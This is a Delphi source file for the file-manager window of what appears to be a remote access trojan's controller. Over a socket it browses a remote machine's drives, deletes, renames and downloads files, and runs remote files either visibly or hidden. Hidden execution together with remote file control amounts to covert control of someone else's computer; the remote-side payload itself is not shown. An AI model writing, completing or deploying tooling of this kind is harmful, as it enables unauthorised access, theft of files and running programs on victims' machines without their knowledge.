unit uFilemanager;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, ComCtrls, ImgList, StdCtrls, Buttons, scktcomp, uCommands, Menus;

type
  TForm2 = class(TForm)
    pgc1: TPageControl;
    ts1: TTabSheet;
    ts2: TTabSheet;
    il1: TImageList;
    cbb1: TComboBoxEx;
    edtPath: TEdit;
    btn1: TBitBtn;
    stat1: TStatusBar;
    lvFiles: TListView;
    pmFileman: TPopupMenu;
    Refresh1: TMenuItem;
    N1: TMenuItem;
    ExecuteFile1: TMenuItem;
    Visible1: TMenuItem;
    Hidden1: TMenuItem;
    DeleteFile1: TMenuItem;
    RenameFile1: TMenuItem;
    N2: TMenuItem;
    DownloadFile1: TMenuItem;
    UploadFiletoPath1: TMenuItem;
    lvTransfer: TListView;
    procedure FormShow(Sender: TObject);
    procedure cbb1Select(Sender: TObject);
    procedure lvFilesDblClick(Sender: TObject);
    procedure btn1Click(Sender: TObject);
    procedure Refresh1Click(Sender: TObject);
    procedure Visible1Click(Sender: TObject);
    procedure Hidden1Click(Sender: TObject);
    procedure DeleteFile1Click(Sender: TObject);
    procedure RenameFile1Click(Sender: TObject);
    procedure DownloadFile1Click(Sender: TObject);
    procedure AddTransfer(sRemotePath,sPath,sFile:string; bDownload:Boolean);
    procedure UploadFiletoPath1Click(Sender: TObject);
  private
    { Private declarations }
  public
    sSocket:Integer;
    cntDownloads:Integer;
    sUsername:String;
    { Public declarations }
  end;

var
  Form2: TForm2;

implementation
uses uMain,uFunctions;
{$R *.dfm}

procedure TForm2.AddTransfer(sRemotePath,sPath,sFile:string; bDownload:Boolean);
var
  lstTemp:TListItem;
  tTrans: TSocketInfo;
  mList: TList;
begin
  cntDownloads := cntDownloads + 1;
  lstTemp := lvTransfer.Items.Add;
  lstTemp.caption := sFile;
  lstTemp.SubItems.Add('0 KByte/s)');
  lstTemp.SubItems.Add('0 %');
  lstTemp.SubItems.Add('-');
  lstTemp.SubItems.Add('Waiting for socket...');

  tTrans := TSocketInfo.Create;
  tTrans.lvItem := lstTemp;
  tTrans.sLocalPath := sPath + sFile;
  tTrans.sRemotePath := sRemotePath + sFile;
  tTrans.lTransferID := cntDownloads;
  tTrans.lSocketID := sSocket;

  if bDownload then
    lstTemp.ImageIndex := 18
  else
    lstTemp.ImageIndex := 17;

  try
    mList := Form1.TransferList.LockList;
    mList.Add(tTrans);
  finally
    Form1.TransferList.UnlockList;
  end;
end;

procedure TForm2.btn1Click(Sender: TObject);
begin
  if Length(edtPath.text) > 3 then begin
    edtPath.text := ExtractFilePath(Copy(edtPath.text, 1, Length(edtPath.text)-1));
  end;
  if edtPath.text <> '' then begin
    lvFiles.Clear;
    If SendPacket(sSocket,PACK_GETDIRS,Form1.edtPassword.text,edtPath.Text) then begin
      Stat1.Panels.Items[0].Text := 'Requesting directories...';
    end else begin
      Stat1.Panels.Items[0].Text := 'Error! Cant request directories!';
    end;
  end;
end;

procedure TForm2.cbb1Select(Sender: TObject);
var
  sPath:String;
begin
  sPath := cbb1.ItemsEx.Items[cbb1.ItemIndex].Caption;
  if sPath <> '' then begin
    lvFiles.Clear;
    edtPath.Text := sPath;
    If SendPacket(sSocket,PACK_GETDIRS,Form1.edtPassword.text,edtPath.Text) then begin
      Stat1.Panels.Items[0].Text := 'Requesting directories...';
    end else begin
      Stat1.Panels.Items[0].Text := 'Error! Cant request directories!';
    end;
  end;
end;

procedure TForm2.DeleteFile1Click(Sender: TObject);
var
  sTempStr:String;
begin
  if lvFiles.Selected = nil then exit;
  if (lvFiles.Selected.SubItems.Strings[0] <> 'Directory') and (lvFiles.Selected.SubItems.Strings[1] <> '-') then begin
    sTempStr := edtPath.Text + lvFiles.Selected.Caption;
    If SendPacket(sSocket,PACK_DELETEFILE,Form1.edtPassword.text,sTempStr) then begin
      Stat1.Panels.Items[0].Text := 'Deleting File...';
    end else begin
      Stat1.Panels.Items[0].Text := 'Socket Error!';
    end;
  end;
end;

procedure TForm2.DownloadFile1Click(Sender: TObject);
var
  sTempStr:String;
begin
  if lvFiles.Selected = nil then exit;
  if (lvFiles.Selected.SubItems.Strings[0] <> 'Directory') and (lvFiles.Selected.SubItems.Strings[1] <> '-') then begin
    AddTransfer(edtPath.Text, GetUserFolder(sUsername + '\Downloads' ), lvFiles.Selected.Caption, True);
    sTempStr := '|' + edtPath.text + lvFiles.Selected.Caption + '|' + IntToStr(sSocket) + '|' + IntToStr(cntDownloads);
    If SendPacket(sSocket,PACK_TRANSFERFILE,Form1.edtPassword.text,sTempStr) then begin
      Stat1.Panels.Items[0].Text := 'Requesting file...';
    end else begin
      Stat1.Panels.Items[0].Text := 'Error! Cant request file!';
    end;
  end;
end;

procedure TForm2.FormShow(Sender: TObject);
begin
  GetUserFolder(sUsername);
  GetUserFolder(sUsername + '\Downloads');
  cbb1.Clear;
  If SendPacket(sSocket,PACK_GETDRIVES,'a','') then begin
    Stat1.Panels.Items[0].Text := 'Requesting drives...';
  end else begin
    Stat1.Panels.Items[0].Text := 'Error! Cant request drives!';
  end;
end;

procedure TForm2.Hidden1Click(Sender: TObject);
var
  sTempStr:String;
begin
  if lvFiles.Selected = nil then exit;
  if (lvFiles.Selected.SubItems.Strings[0] <> 'Directory') and (lvFiles.Selected.SubItems.Strings[1] <> '-') then begin
    sTempStr := edtPath.Text + lvFiles.Selected.Caption;
    If SendPacket(sSocket,PACK_EXECUTEFILEHIDDEN,Form1.edtPassword.text,sTempStr) then begin
      Stat1.Panels.Items[0].Text := 'Executing File...';
    end else begin
      Stat1.Panels.Items[0].Text := 'Socket Error!';
    end;
  end;
end;

procedure TForm2.lvFilesDblClick(Sender: TObject);
begin
  if lvFiles.Selected = nil then exit;
  if (lvFiles.Selected.SubItems.Strings[0] = 'Directory') and (lvFiles.Selected.SubItems.Strings[1] = '-') then begin
    edtPath.Text := edtPath.Text + lvFiles.Selected.Caption + '\';
    lvFiles.Clear;
    If SendPacket(sSocket,PACK_GETDIRS,'a',edtPath.Text) then begin
      Stat1.Panels.Items[0].Text := 'Requesting directories...';
    end else begin
      Stat1.Panels.Items[0].Text := 'Error! Cant request directories!';
    end;
  end;
end;

procedure TForm2.Refresh1Click(Sender: TObject);
begin
  lvFiles.Clear;
  If SendPacket(sSocket,PACK_GETDIRS,Form1.edtPassword.text,edtPath.Text) then begin
    Stat1.Panels.Items[0].Text := 'Requesting directories...';
  end else begin
    Stat1.Panels.Items[0].Text := 'Error! Cant request directories!';
  end;
end;

procedure TForm2.RenameFile1Click(Sender: TObject);
var
  sTemp:String;
begin
  if lvFiles.Selected = nil then exit;
  sTemp := InputBox('Rename File','Type in the new name','');
  if sTemp <> '' then begin
    sTemp := '|' + edtPath.Text + '|' +  lvFiles.Selected.Caption + '|' + sTemp;
    If SendPacket(sSocket,PACK_MOVEFILE,Form1.edtPassword.text,sTemp) then begin
      Stat1.Panels.Items[0].Text := 'Requesting directories...';
    end else begin
      Stat1.Panels.Items[0].Text := 'Error! Cant request directories!';
    end;
  end;
end;

procedure TForm2.UploadFiletoPath1Click(Sender: TObject);
begin
  if lvFiles.Selected = nil then exit;
  if (lvFiles.Selected.SubItems.Strings[0] <> 'Directory') and (lvFiles.Selected.SubItems.Strings[1] <> '-') then begin
    //AddTransfer(edtPath.Text, GetUserFolder(sSocket), lvFiles.Selected.Caption, False);
  end;
end;

procedure TForm2.Visible1Click(Sender: TObject);
var
  sTempStr:String;
begin
  if lvFiles.Selected = nil then exit;
  if (lvFiles.Selected.SubItems.Strings[0] <> 'Directory') and (lvFiles.Selected.SubItems.Strings[1] <> '-') then begin
    sTempStr := edtPath.Text + lvFiles.Selected.Caption;
    If SendPacket(sSocket,PACK_EXECUTEFILEVISIBLE,Form1.edtPassword.text,sTempStr) then begin
      Stat1.Panels.Items[0].Text := 'Executing File...';
    end else begin
      Stat1.Panels.Items[0].Text := 'Socket Error!';
    end;
  end;
end;

end.
